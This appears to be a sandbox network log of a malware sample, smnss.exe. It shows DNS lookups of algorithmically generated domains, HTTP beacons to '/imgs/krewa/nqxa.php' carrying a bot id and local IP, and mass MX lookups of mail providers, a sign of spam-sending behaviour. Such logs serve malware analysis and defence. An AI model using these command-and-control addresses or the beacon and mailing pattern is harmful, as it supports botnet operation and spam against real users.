sesawnwqea.biz

IN A

Response
DNS

qpwhwpqpqa.info

smnss.exe

Remote address:

8.8.8.8:53

Request

qpwhwpqpqa.info

IN A

Response
DNS

mqmwshhaqh.in

smnss.exe

Remote address:

8.8.8.8:53

Request

mqmwshhaqh.in

IN A

Response
DNS

mqmwshhaqh.in

smnss.exe

Remote address:

8.8.8.8:53

Request

mqmwshhaqh.in

IN A
DNS

206.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.23.85.13.in-addr.arpa

IN PTR

Response
DNS

rrqmheqmqh.org

smnss.exe

Remote address:

8.8.8.8:53

Request

rrqmheqmqh.org

IN A

Response

rrqmheqmqh.org

IN A

162.249.65.106
DNS

rrqmheqmqh.org

smnss.exe

Remote address:

8.8.8.8:53

Request

rrqmheqmqh.org

IN A
DNS

rrqmheqmqh.org

smnss.exe

Remote address:

8.8.8.8:53

Request

rrqmheqmqh.org

IN A
DNS

rrqmheqmqh.org

smnss.exe

Remote address:

8.8.8.8:53

Request

rrqmheqmqh.org

IN A
DNS

in1-smtp.messagingengine.com

smnss.exe

Remote address:

8.8.8.8:53

Request

in1-smtp.messagingengine.com

IN A

Response

in1-smtp.messagingengine.com

IN A

103.168.172.221

in1-smtp.messagingengine.com

IN A

103.168.172.217

in1-smtp.messagingengine.com

IN A

103.168.172.219

in1-smtp.messagingengine.com

IN A

103.168.172.216

in1-smtp.messagingengine.com

IN A

103.168.172.218

in1-smtp.messagingengine.com

IN A

103.168.172.220
DNS

in1-smtp.messagingengine.com

smnss.exe

Remote address:

8.8.8.8:53

Request

in1-smtp.messagingengine.com

IN A
DNS

netcom.com

smnss.exe

Remote address:

8.8.8.8:53

Request

netcom.com

IN MX

Response

netcom.com

IN MX

mx04earthlink-vadesecurenet

netcom.com

IN MX

mx01�/

netcom.com

IN MX

mx03�/

netcom.com

IN MX

mx02�/
DNS

netcom.com

smnss.exe

Remote address:

8.8.8.8:53

Request

netcom.com

IN MX
DNS

northcoast.com

smnss.exe

Remote address:

8.8.8.8:53

Request

northcoast.com

IN MX

Response

northcoast.com

IN MX

mxa-00377f03gslbpphosted�

northcoast.com

IN MX

mxb-00377f03�;

northcoast.com

IN MX

mxb-00377f01�;

northcoast.com

IN MX

mxa-00377f01�;
DNS

northcoast.com

smnss.exe

Remote address:

8.8.8.8:53

Request

northcoast.com

IN MX
DNS

cl.cam.ac.uk

smnss.exe

Remote address:

8.8.8.8:53

Request

cl.cam.ac.uk

IN MX

Response

cl.cam.ac.uk

IN MX

mx�
DNS

cl.cam.ac.uk

smnss.exe

Remote address:

8.8.8.8:53

Request

cl.cam.ac.uk

IN MX
DNS

cl.cam.ac.uk

smnss.exe

Remote address:

8.8.8.8:53

Request

cl.cam.ac.uk

IN MX
DNS

src.dec.com

smnss.exe

Remote address:

8.8.8.8:53

Request

src.dec.com

IN MX

Response
DNS

src.dec.com

smnss.exe

Remote address:

8.8.8.8:53

Request

src.dec.com

IN MX
DNS

mx04.earthlink-vadesecure.net

smnss.exe

Remote address:

8.8.8.8:53

Request

mx04.earthlink-vadesecure.net

IN A

Response

mx04.earthlink-vadesecure.net

IN A

147.135.98.120
DNS

mxa-00377f03.gslb.pphosted.com

smnss.exe

Remote address:

8.8.8.8:53

Request

mxa-00377f03.gslb.pphosted.com

IN A

Response

mxa-00377f03.gslb.pphosted.com

IN A

205.220.164.130
DNS

mx.cam.ac.uk

smnss.exe

Remote address:

8.8.8.8:53

Request

mx.cam.ac.uk

IN A

Response

mx.cam.ac.uk

IN A

131.111.8.148

mx.cam.ac.uk

IN A

131.111.8.146

mx.cam.ac.uk

IN A

131.111.8.147

mx.cam.ac.uk

IN A

131.111.8.149
DNS

theriver.com

smnss.exe

Remote address:

8.8.8.8:53

Request

theriver.com

IN MX

Response

theriver.com

IN MX

ismtpsitestareveryonenet
DNS

bryson.demon.co.uk

smnss.exe

Remote address:

8.8.8.8:53

Request

bryson.demon.co.uk

IN MX

Response
DNS

onlineconnections.com.au

smnss.exe

Remote address:

8.8.8.8:53

Request

onlineconnections.com.au

IN MX

Response

onlineconnections.com.au

IN MX

�
DNS

openoffice.org

smnss.exe

Remote address:

8.8.8.8:53

Request

openoffice.org

IN MX

Response

openoffice.org

IN MX

mx1-lw-euapache�

openoffice.org

IN MX

mx1-lw-us�8

openoffice.org

IN MX

mx2-lw-eu�8

openoffice.org

IN MX

mx2-lw-us�8
DNS

ismtp.sitestar.everyone.net

smnss.exe

Remote address:

8.8.8.8:53

Request

ismtp.sitestar.everyone.net

IN A

Response

ismtp.sitestar.everyone.net

IN A

64.29.151.236
DNS

mx1-lw-eu.apache.org

smnss.exe

Remote address:

8.8.8.8:53

Request

mx1-lw-eu.apache.org

IN A

Response
DNS

mx1-lw-us.apache.org

smnss.exe

Remote address:

8.8.8.8:53

Request

mx1-lw-us.apache.org

IN A

Response
DNS

onlineconnections.com.au

smnss.exe

Remote address:

8.8.8.8:53

Request

onlineconnections.com.au

IN A

Response

onlineconnections.com.au

IN A

192.254.190.168
DNS

mx2-lw-eu.apache.org

smnss.exe

Remote address:

8.8.8.8:53

Request

mx2-lw-eu.apache.org

IN A

Response
DNS

mx2-lw-us.apache.org

smnss.exe

Remote address:

8.8.8.8:53

Request

mx2-lw-us.apache.org

IN A

Response
DNS

ehpspqshqa.ws

smnss.exe

Remote address:

8.8.8.8:53

Request

ehpspqshqa.ws

IN A

Response

ehpspqshqa.ws

IN A

64.70.19.203
GET

http://ehpspqshqa.ws/imgs/krewa/nqxa.php?id=4744qyhn&s5=3159&lip=10.127.1.206&win=Unk

smnss.exe

Remote address:

64.70.19.203:80

Request

GET /imgs/krewa/nqxa.php?id=4744qyhn&s5=3159&lip=10.127.1.206&win=Unk HTTP/1.1
Host: ehpspqshqa.ws
User-Agent: explwer
DNS

phphweqwna.in

smnss.exe

Remote address:

8.8.8.8:53

Request

phphweqwna.in

IN A

Response
DNS

147.142.123.92.in-addr.arpa

Remote address:

8.8.8.8:53

Request

147.142.123.92.in-addr.arpa

IN PTR

Response

147.142.123.92.in-addr.arpa

IN PTR

a92-123-142-147deploystaticakamaitechnologiescom
DNS

147.142.123.92.in-addr.arpa

Remote address:

8.8.8.8:53

Request

147.142.123.92.in-addr.arpa

IN PTR
DNS

147.142.123.92.in-addr.arpa

Remote address:

8.8.8.8:53

Request

147.142.123.92.in-addr.arpa

IN PTR
DNS

snprrannra.biz

smnss.exe

Remote address:

8.8.8.8:53

Request

snprrannra.biz

IN A

Response
DNS

rahqwwphsh.org

smnss.exe

Remote address:

8.8.8.8:53

Request

rahqwwphsh.org

IN A

Response

rahqwwphsh.org

IN A

162.249.65.106
DNS

hpehwwhnqn.net

smnss.exe

Remote address:

8.8.8.8:53

Request

hpehwwhnqn.net

IN A

Response
DNS

pmqmannrna.in

smnss.exe

Remote address:

8.8.8.8:53

Request

pmqmannrna.in

IN A

Response
DNS

mrrmehqnpa.in

smnss.exe

Remote address:

8.8.8.8:53

Request

mrrmehqnpa.in

IN A

Response
DNS

mrrmehqnpa.in

smnss.exe

Remote address:

8.8.8.8:53

Request

mrrmehqnpa.in

IN A

Response
DNS

mrrmehqnpa.in

smnss.exe

Remote address:

8.8.8.8:53

Request

mrrmehqnpa.in

IN A
DNS

alumni-caltech-edu.mail.protection.outlook.com

smnss.exe

Remote address:

8.8.8.8:53

Request

alumni-caltech-edu.mail.protection.outlook.com

IN A

Response

alumni-caltech-edu.mail.protection.outlook.com

IN A

52.101.40.1

alumni-caltech-edu.mail.protection.outlook.com

IN A

52.101.194.13

alumni-caltech-edu.mail.protection.outlook.com

IN A

52.101.9.14

alumni-caltech-edu.mail.protection.outlook.com

IN A

52.101.41.6
DNS

nongnu.org

smnss.exe

Remote address:

8.8.8.8:53

Request

nongnu.org

IN MX

Response

nongnu.org

IN MX

eggsgnu�
DNS

eggs.gnu.org

smnss.exe

Remote address:

8.8.8.8:53

Request

eggs.gnu.org

IN A

Response

eggs.gnu.org

IN A

209.51.188.92
DNS

cs.stanford.edu

smnss.exe

Remote address:

8.8.8.8:53

Request

cs.stanford.edu

IN A

Response

cs.stanford.edu

IN A

171.64.64.64
DNS

cs.stanford.edu

smnss.exe

Remote address:

8.8.8.8:53

Request

cs.stanford.edu

IN A
DNS

qwpehrrhqh.info

smnss.exe

Remote address:

8.8.8.8:53

Request

qwpehrrhqh.info

IN A

Response
DNS

qwpehrrhqh.info

smnss.exe

Remote address:

8.8.8.8:53

Request

qwpehrrhqh.info

IN A
DNS

meammaenmn.in

smnss.exe

Remote address:

8.8.8.8:53

Request

meammaenmn.in

IN A

Response
DNS

rsampnrran.org

smnss.exe

Remote address:

8.8.8.8:53

Request

rsampnrran.org

IN A

Response

rsampnrran.org

IN A

162.249.65.106
DNS

rsampnrran.org

smnss.exe

Remote address:

8.8.8.8:53

Request

rsampnrran.org

IN A
DNS

kinoho.net

smnss.exe

Remote address:

8.8.8.8:53

Request

kinoho.net

IN MX

Response

kinoho.net

IN MX

(aspmx2 googlemailcom

kinoho.net

IN MX

alt1aspmxlgoogle�<

kinoho.net

IN MX

�T

kinoho.net

IN MX

2aspmx3�1

kinoho.net

IN MX

alt2�T
DNS

kinoho.net

smnss.exe

Remote address:

8.8.8.8:53

Request

kinoho.net

IN MX
DNS

riseup.net

smnss.exe

Remote address:

8.8.8.8:53

Request

riseup.net

IN MX

Response

riseup.net

IN MX

mx1�
DNS

riseup.net

smnss.exe

Remote address:

8.8.8.8:53

Request

riseup.net

IN MX
DNS

aspmx2.googlemail.com

smnss.exe

Remote address:

8.8.8.8:53

Request

aspmx2.googlemail.com

IN A

Response

aspmx2.googlemail.com

IN A

142.250.27.26
DNS

mx1.riseup.net

smnss.exe

Remote address:

8.8.8.8:53

Request

mx1.riseup.net

IN A

Response

mx1.riseup.net

IN A

198.252.153.129
DNS

mx1.riseup.net

smnss.exe

Remote address:

8.8.8.8:53

Request

mx1.riseup.net

IN A
DNS

alt4.gmail-smtp-in.l.google.com

smnss.exe

Remote address:

8.8.8.8:53

Request

alt4.gmail-smtp-in.l.google.com

IN A

Response

alt4.gmail-smtp-in.l.google.com

IN A

142.250.150.26
DNS

aspmx.l.google.com

smnss.exe

Remote address:

8.8.8.8:53

Request

aspmx.l.google.com

IN A

Response

aspmx.l.google.com

IN A

209.85.202.27
DNS

mx-in-ma.apple.com

smnss.exe

Remote address:

8.8.8.8:53

Request

mx-in-ma.apple.com

IN A

Response

mx-in-ma.apple.com

IN A

17.171.208.6
DNS

mx-in-ma.apple.com

smnss.exe

Remote address:

8.8.8.8:53

Request

mx-in-ma.apple.com

IN A
DNS

pb-mx11.pobox.com

smnss.exe

Remote address:

8.8.8.8:53

Request

pb-mx11.pobox.com

IN A

Response

pb-mx11.pobox.com

IN A

64.147.108.52
DNS

pb-mx11.pobox.com

smnss.exe

Remote address:

8.8.8.8:53

Request

pb-mx11.pobox.com

IN A
DNS

mail.ru

smnss.exe

Remote address:

8.8.8.8:53

Request

mail.ru

IN MX

Response

mail.ru

IN MX

mxs�
DNS

mail.ru

smnss.exe

Remote address:

8.8.8.8:53

Request

mail.ru

IN MX
DNS

bog.msu.ru

smnss.exe

Remote address:

8.8.8.8:53

Request

bog.msu.ru

IN MX

Response
DNS

bog.msu.ru

smnss.exe

Remote address:

8.8.8.8:53

Request

bog.msu.ru

IN MX

Response
DNS

mxs.mail.ru

smnss.exe

Remote address:

8.8.8.8:53

Request

mxs.mail.ru

IN A

Response

mxs.mail.ru

IN A

217.69.139.150

mxs.mail.ru

IN A

94.100.180.31
DNS

mx01.earthlink-vadesecure.net

smnss.exe

Remote address:

8.8.8.8:53

Request

mx01.earthlink-vadesecure.net

IN A

Response

mx01.earthlink-vadesecure.net

IN A

51.81.61.70
DNS

mx01.earthlink-vadesecure.net

smnss.exe

Remote address:

8.8.8.8:53

Request

mx01.earthlink-vadesecure.net

IN A
DNS

mxb-00377f03.gslb.pphosted.com

smnss.exe

Remote address:

8.8.8.8:53

Request

mxb-00377f03.gslb.pphosted.com

IN A

Response

mxb-00377f03.gslb.pphosted.com

IN A

205.220.176.130
DNS

mrmwmnarws.in

smnss.exe

Remote address:

8.8.8.8:53

Request

mrmwmnarws.in

IN A

Response
DNS

nwrnwprmmh.us

smnss.exe

Remote address:

8.8.8.8:53

Request

nwrnwprmmh.us

IN A

Response
DNS

nwrnwprmmh.us

smnss.exe

Remote address:

8.8.8.8:53

Request

nwrnwprmmh.us

IN A
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR

Response
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR
DNS

55.36.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

55.36.223.20.in-addr.arpa

IN PTR

Response
DNS

sshnsrpenh.biz

smnss.exe

Remote address:

8.8.8.8:53

Request

sshnsrpenh.biz

IN A

Response
DNS

psnqrqmpeh.in

smnss.exe

Remote address:

8.8.8.8:53

Request

psnqrqmpeh.in

IN A

Response
DNS

wwearmsqrs.in

smnss.exe

Remote address:

8.8.8.8:53

Request

wwearmsqrs.in

IN A

Response
DNS

wwearmsqrs.in

smnss.exe

Remote address:

8.8.8.8:53

Request

wwearmsqrs.in

IN A
DNS

wwearmsqrs.in

smnss.exe

Remote address:

8.8.8.8:53

Request

wwearmsqrs.in

IN A
DNS

wwearmsqrs.in

smnss.exe

Remote address:

8.8.8.8:53

Request

wwearmsqrs.in

IN A
DNS

aqanannwqh.com

smnss.exe

Remote address:

8.8.8.8:53

Request

aqanannwqh.com

IN A

Response
DNS

aqanannwqh.com

smnss.exe

Remote address:

8.8.8.8:53

Request

aqanannwqh.com

IN A
DNS

aqanannwqh.com

smnss.exe

Remote address:

8.8.8.8:53

Request

aqanannwqh.com

IN A
DNS

wasasnqrna.in

smnss.exe

Remote address:

8.8.8.8:53

Request

wasasnqrna.in

IN A

Response
DNS

wasasnqrna.in

smnss.exe

Remote address:

8.8.8.8:53

Request

wasasnqrna.in

IN A
DNS

wnshehamhh.in

smnss.exe

Remote address:

8.8.8.8:53

Request

wnshehamhh.in

IN A

Response
DNS

remrpqpseh.org

smnss.exe

Remote address:

8.8.8.8:53

Request

remrpqpseh.org

IN A

Response

remrpqpseh.org

IN A

162.249.65.106
DNS

hwnppemeea.net

smnss.exe

Remote address:

8.8.8.8:53

Request

hwnppemeea.net

IN A

Response
DNS

pnaqheqnsa.in

smnss.exe

Remote address:

8.8.8.8:53

Request

pnaqheqnsa.in

IN A

Response
DNS

mwhnpqrmrn.in

smnss.exe

Remote address:

8.8.8.8:53

Request

mwhnpqrmrn.in

IN A

Response
DNS

pwramqmsms.in

smnss.exe

Remote address:

8.8.8.8:53

Request

pwramqmsms.in

IN A

Response
DNS

hmamsmwhar.net

smnss.exe

Remote address:

8.8.8.8:53

Request

hmamsmwhar.net

IN A

Response
DNS

hmamsmwhar.net

smnss.exe

Remote address:

8.8.8.8:53

Request

hmamsmwhar.net

IN A
DNS

hmamsmwhar.net

smnss.exe

Remote address:

8.8.8.8:53

Request

hmamsmwhar.net

IN A
DNS

gmail-smtp-in.l.google.com

smnss.exe

Remote address:

8.8.8.8:53

Request

gmail-smtp-in.l.google.com

IN A

Response

gmail-smtp-in.l.google.com

IN A

209.85.203.27
DNS

gmail-smtp-in.l.google.com

smnss.exe

Remote address:

8.8.8.8:53

Request

gmail-smtp-in.l.google.com

IN A
DNS

mx-in-rno.apple.com

smnss.exe

Remote address:

8.8.8.8:53

Request

mx-in-rno.apple.com

IN A

Response

mx-in-rno.apple.com

IN A

17.179.253.242
DNS

mx-in-rno.apple.com

smnss.exe

Remote address:

8.8.8.8:53

Request

mx-in-rno.apple.com

IN A
DNS

mx-in-rno.apple.com

smnss.exe

Remote address:

8.8.8.8:53

Request

mx-in-rno.apple.com

IN A
DNS

mx-in-rno.apple.com

smnss.exe

Remote address:

8.8.8.8:53

Request

mx-in-rno.apple.com

IN A
DNS

pb-mx9.pobox.com

smnss.exe

Remote address:

8.8.8.8:53

Request

pb-mx9.pobox.com

IN A

Response

pb-mx9.pobox.com

IN A

64.147.108.50
DNS

pb-mx9.pobox.com

smnss.exe

Remote address:

8.8.8.8:53

Request

pb-mx9.pobox.com

IN A
DNS

pqshhpemrn.in

smnss.exe

Remote address:

8.8.8.8:53

Request

pqshhpemrn.in

IN A

Response
DNS

wpqqhhspps.in

smnss.exe

Remote address:

8.8.8.8:53

Request

wpqqhhspps.in

IN A

Response

wpqqhhspps.in

IN A

13.251.16.150
GET

http://wpqqhhspps.in/imgs/krewa/nqxa.php?id=4744qyhn&s5=3159&lip=10.127.1.206&win=Unk

smnss.exe

Remote address:

13.251.16.150:80

Request

GET /imgs/krewa/nqxa.php?id=4744qyhn&s5=3159&lip=10.127.1.206&win=Unk HTTP/1.1
Host: wpqqhhspps.in
User-Agent: explwer

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 25 Aug 2024 23:11:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=eb14d93fee5c6a31c71e5425d1ca5444|194.110.13.70|1724627468|1724627468|0|1|0; path=/; domain=.wpqqhhspps.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

nqenrpwpeh.us

smnss.exe

Remote address:

8.8.8.8:53

Request

nqenrpwpeh.us

IN A

Response
DNS

nqenrpwpeh.us

smnss.exe

Remote address:

8.8.8.8:53

Request

nqenrpwpeh.us

IN A
DNS

150.16.251.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

150.16.251.13.in-addr.arpa

IN PTR

Response

150.16.251.13.in-addr.arpa

IN PTR

ec2-13-251-16-150ap-southeast-1compute amazonawscom
DNS

150.16.251.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

150.16.251.13.in-addr.arpa

IN PTR
DNS

150.16.251.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

150.16.251.13.in-addr.arpa

IN PTR
DNS

spawwehsrs.biz

smnss.exe

Remote address:

8.8.8.8:53

Request

spawwehsrs.biz

IN A

Response
DNS

spawwehsrs.biz

smnss.exe

Remote address:

8.8.8.8:53

Request

spawwehsrs.biz

IN A
DNS

mxb-00377f01.gslb.pphosted.com

smnss.exe

Remote address:

8.8.8.8:53

Request

mxb-00377f01.gslb.pphosted.com

IN A

Response

mxb-00377f01.gslb.pphosted.com

IN A

185.132.181.97
DNS

mxb-00377f01.gslb.pphosted.com

smnss.exe

Remote address:

8.8.8.8:53

Request

mxb-00377f01.gslb.pphosted.com

IN A
DNS

ppeseaqmms.in

smnss.exe

Remote address:

8.8.8.8:53

Request

ppeseaqmms.in

IN A

Response
DNS

msarphnewh.in

smnss.exe

Remote address:

8.8.8.8:53

Request

msarphnewh.in

IN A

Response
DNS

pwqpewwahh.in

smnss.exe

Remote address:

8.8.8.8:53

Request

pwqpewwahh.in

IN A

Response
DNS

hmparqsaqa.net

smnss.exe

Remote address:

8.8.8.8:53

Request

hmparqsaqa.net

IN A

Response
DNS

qsqpspspqn.info

smnss.exe

Remote address:

8.8.8.8:53

Request

qsqpspspqn.info

IN A

Response
DNS

haearrsqhn.net

smnss.exe

Remote address:

8.8.8.8:53

Request

haearrsqhn.net

IN A

Response
DNS

qnrnwnwaas.info

smnss.exe

Remote address:

8.8.8.8:53

Request

qnrnwnwaas.info

IN A

Response
DNS

qnrnwnwaas.info

smnss.exe

Remote address:

8.8.8.8:53

Request

qnrnwnwaas.info

IN A
DNS

mx03.earthlink-vadesecure.net

smnss.exe

Remote address:

8.8.8.8:53

Request

mx03.earthlink-vadesecure.net

IN A

Response

mx03.earthlink-vadesecure.net

IN A

51.81.232.218
DNS

weaeprawra.in

smnss.exe

Remote address:

8.8.8.8:53

Request

weaeprawra.in

IN A

Response
DNS

qmhqeesawh.info

smnss.exe

Remote address:

8.8.8.8:53

Request

qmhqeesawh.info

IN A

Response
DNS

ssnsphrnws.biz

smnss.exe

Remote address:

8.8.8.8:53

Request

ssnsphrnws.biz

IN A

Response
DNS

aewrhprres.com

smnss.exe

Remote address:

8.8.8.8:53

Request

aewrhprres.com

IN A

Response

aewrhprres.com

IN A

216.245.214.81
DNS

aewrhprres.com

smnss.exe

Remote address:

8.8.8.8:53

Request

aewrhprres.com

IN A
DNS

mpehqsqwmn.in

smnss.exe

Remote address:

8.8.8.8:53

Request

mpehqsqwmn.in

IN A

Response
DNS

rnrmmnpnpn.org

smnss.exe

Remote address:

8.8.8.8:53

Request

rnrmmnpnpn.org

IN A

Response

rnrmmnpnpn.org

IN A

162.249.65.106
DNS

mwaaemmnhn.in

smnss.exe

Remote address:

8.8.8.8:53

Request

mwaaemmnhn.in

IN A

Response
DNS

mwaaemmnhn.in

smnss.exe

Remote address:

8.8.8.8:53

Request

mwaaemmnhn.in

IN A
DNS

19.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

19.229.111.52.in-addr.arpa

IN PTR

Response
DNS

asnrrsamsa.com

smnss.exe

Remote address:

8.8.8.8:53

Request

asnrrsamsa.com

IN A

Response

asnrrsamsa.com

IN A

212.32.237.91
GET

http://asnrrsamsa.com/imgs/krewa/nqxa.php?id=4744qyhn&s5=3159&lip=10.127.1.206&win=Unk

smnss.exe

Remote address:

212.32.237.91:80

Request

GET /imgs/krewa/nqxa.php?id=4744qyhn&s5=3159&lip=10.127.1.206&win=Unk HTTP/1.1
Host: asnrrsamsa.com
User-Agent: explwer

Response

HTTP/1.1 429 Too Many Requests

cache-control: max-age=0, private, must-revalidate
connection: close
content-length: 17
date: Sun, 25 Aug 2024 23:11:22 GMT
server: nginx
set-cookie: sid=575b4038-6337-11ef-a624-403abb638ec0; path=/; domain=.asnrrsamsa.com; expires=Sat, 13 Sep 2092 02:25:29 GMT; max-age=2147483647; HttpOnly
DNS

91.237.32.212.in-addr.arpa

Remote address:

8.8.8.8:53

Request

91.237.32.212.in-addr.arpa

IN PTR

Response
DNS

whmrraawha.in

smnss.exe

Remote address:

8.8.8.8:53

Request

whmrraawha.in

IN A

Response
DNS

qmsaspnsna.info

smnss.exe

Remote address:

8.8.8.8:53

Request

qmsaspnsna.info

IN A

Response
DNS

hnehqqwwrs.net

smnss.exe

Remote address:

8.8.8.8:53

Request

hnehqqwwrs.net

IN A

Response
DNS

qppamspwhs.info

smnss.exe

Remote address:

8.8.8.8:53

Request

qppamspwhs.info

IN A

Response
DNS

weeqshswms.in

smnss.exe

Remote address:

8.8.8.8:53

Request

weeqshswms.in

IN A

Response
DNS

aanparshnh.com

smnss.exe

Remote address:

8.8.8.8:53

Request

aanparshnh.com

IN A

Response

aanparshnh.com

IN A

77.247.183.147
DNS

aanparshnh.com

smnss.exe

Remote address:

8.8.8.8:53

Request

aanparshnh.com

IN A
GET

http://aanparshnh.com/imgs/krewa/nqxa.php?id=4744qyhn&s5=3159&lip=10.127.1.206&win=Unk

smnss.exe

Remote address:

77.247.183.147:80

Request

GET /imgs/krewa/nqxa.php?id=4744qyhn&s5=3159&lip=10.127.1.206&win=Unk HTTP/1.1
Host: aanparshnh.com
User-Agent: explwer

Response

HTTP/1.1 429 Too Many Requests

cache-control: max-age=0, private, must-revalidate
connection: close
content-length: 17
date: Sun, 25 Aug 2024 23:11:22 GMT
server: nginx
set-cookie: sid=58cad302-6337-11ef-93e9-4d0246d19df5; path=/; domain=.aanparshnh.com; expires=Sat, 13 Sep 2092 02:25:30 GMT; max-age=2147483647; HttpOnly
DNS

hpeqherars.net

smnss.exe

Remote address:

8.8.8.8:53

Request

hpeqherars.net

IN A

Response
DNS

nnhhneqnrh.us

smnss.exe

Remote address:

8.8.8.8:53

Request

nnhhneqnrh.us

IN A

Response
DNS

saanqmaqpn.biz

smnss.exe

Remote address:

8.8.8.8:53

Request

saanqmaqpn.biz

IN A

Response
DNS

armahmrsaa.com

smnss.exe

Remote address:

8.8.8.8:53

Request

armahmrsaa.com

IN A

Response
DNS

wqahhaqenh.in

smnss.exe

Remote address:

8.8.8.8:53

Request

wqahhaqenh.in

IN A

Response
DNS

aharwhphnh.com

smnss.exe

Remote address:

8.8.8.8:53

Request

aharwhphnh.com

IN A

Response

aharwhphnh.com

IN A

23.82.12.30
GET

http://aharwhphnh.com/imgs/krewa/nqxa.php?id=4744qyhn&s5=3159&lip=10.127.1.206&win=Unk

smnss.exe

Remote address:

23.82.12.30:80

Request

GET /imgs/krewa/nqxa.php?id=4744qyhn&s5=3159&lip=10.127.1.206&win=Unk HTTP/1.1
Host: aharwhphnh.com
User-Agent: explwer

Response

HTTP/1.1 429 Too Many Requests

cache-control: max-age=0, private, must-revalidate
connection: close
content-length: 17
date: Sun, 25 Aug 2024 23:11:23 GMT
server: nginx
set-cookie: sid=591eac04-6337-11ef-afb7-5c58311cfa42; path=/; domain=.aharwhphnh.com; expires=Sat, 13 Sep 2092 02:25:31 GMT; max-age=2147483647; HttpOnly
DNS

mnrepmepar.in

smnss.exe

Remote address:

8.8.8.8:53

Request

mnrepmepar.in

IN A

Response

mnrepmepar.in

IN A

13.251.16.150
DNS

mnrepmepar.in

smnss.exe

Remote address:

8.8.8.8:53

Request

mnrepmepar.in

IN A
DNS

147.183.247.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

147.183.247.77.in-addr.arpa

IN PTR

Response
DNS

30.12.82.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

30.12.82.23.in-addr.arpa

IN PTR

Response
GET

http://mnrepmepar.in/imgs/krewa/nqxa.php?id=4744qyhn&s5=3159&lip=10.127.1.206&win=Unk

smnss.exe

Remote address:

13.251.16.150:80

Request

GET /imgs/krewa/nqxa.php?id=4744qyhn&s5=3159&lip=10.127.1.206&win=Unk HTTP/1.1
Host: mnrepmepar.in
User-Agent: explwer

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 25 Aug 2024 23:11:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=dcaa4bf894097a85ba51dea14ac1d594|194.110.13.70|1724627486|1724627486|0|1|0; path=/; domain=.mnrepmepar.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

apqhwmnqrh.com

smnss.exe

Remote address:

8.8.8.8:53

Request

apqhwmnqrh.com

IN A

Response
DNS

apqhwmnqrh.com

smnss.exe

Remote address:

8.8.8.8:53

Request

apqhwmnqrh.com

IN A
DNS

apqhwmnqrh.com

smnss.exe

Remote address:

8.8.8.8:53

Request

apqhwmnqrh.com

IN A
DNS

apqhwmnqrh.com

smnss.exe

Remote address:

8.8.8.8:53

Request

apqhwmnqrh.com

IN A
DNS

aspmx4.googlemail.com

smnss.exe

Remote address:

8.8.8.8:53

Request

aspmx4.googlemail.com

IN A

Response

aspmx4.googlemail.com

IN A

142.251.9.26
DNS

aspmx4.googlemail.com

smnss.exe

Remote address:

8.8.8.8:53

Request

aspmx4.googlemail.com

IN A
DNS

aspmx4.googlemail.com

smnss.exe

Remote address:

8.8.8.8:53

Request

aspmx4.googlemail.com

IN A
DNS

alt1.gmail-smtp-in.l.google.com

smnss.exe

Remote address:

8.8.8.8:53

Request

alt1.gmail-smtp-in.l.google.com

IN A

Response

alt1.gmail-smtp-in.l.google.com

IN A

142.250.27.26
DNS

pb-mx21.pobox.com

smnss.exe

Remote address:

8.8.8.8:53

Request

pb-mx21.pobox.com

IN A

Response

pb-mx21.pobox.com

IN A

173.228.157.40
DNS

pb-mx21.pobox.com

smnss.exe

Remote address:

8.8.8.8:53

Request

pb-mx21.pobox.com

IN A
DNS

mehsnsamha.in

smnss.exe

Remote address:

8.8.8.8:53

Request

mehsnsamha.in

IN A

Response
DNS

qqpqwehwah.info

smnss.exe

Remote address:

8.8.8.8:53

Request

qqpqwehwah.info

IN A

Response
DNS

qqpqwehwah.info

smnss.exe

Remote address:

8.8.8.8:53

Request

qqpqwehwah.info

IN A
DNS

sqmswpnqws.biz

smnss.exe

Remote address:

8.8.8.8:53

Request

sqmswpnqws.biz

IN A

Response
DNS

mx-in-sg.apple.com

smnss.exe

Remote address:

8.8.8.8:53

Request

mx-in-sg.apple.com

IN A

Response

mx-in-sg.apple.com

IN A

17.23.14.18
DNS

pqarnhhhhn.in

smnss.exe

Remote address:

8.8.8.8:53

Request

pqarnhhhhn.in

IN A

Response
DNS

hqepnmqewn.net

smnss.exe

Remote address:

8.8.8.8:53

Request

hqepnmqewn.net

IN A

Response
DNS

rsrsemnren.org

smnss.exe

Remote address:

8.8.8.8:53

Request

rsrsemnren.org

IN A

Response

rsrsemnren.org

IN A

216.245.214.85
GET

http://rsrsemnren.org/imgs/krewa/nqxa.php?id=4744qyhn&s5=3159&lip=10.127.1.206&win=Unk

smnss.exe

Remote address:

216.245.214.85:80

Request

GET /imgs/krewa/nqxa.php?id=4744qyhn&s5=3159&lip=10.127.1.206&win=Unk HTTP/1.1
Host: rsrsemnren.org
User-Agent: explwer

Response

HTTP/1.1 200 OK

accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
cache-control: max-age=0, private, must-revalidate
connection: close
content-length: 539
content-type: text/html; charset=utf-8
date: Sun, 25 Aug 2024 23:11:31 GMT
server: nginx
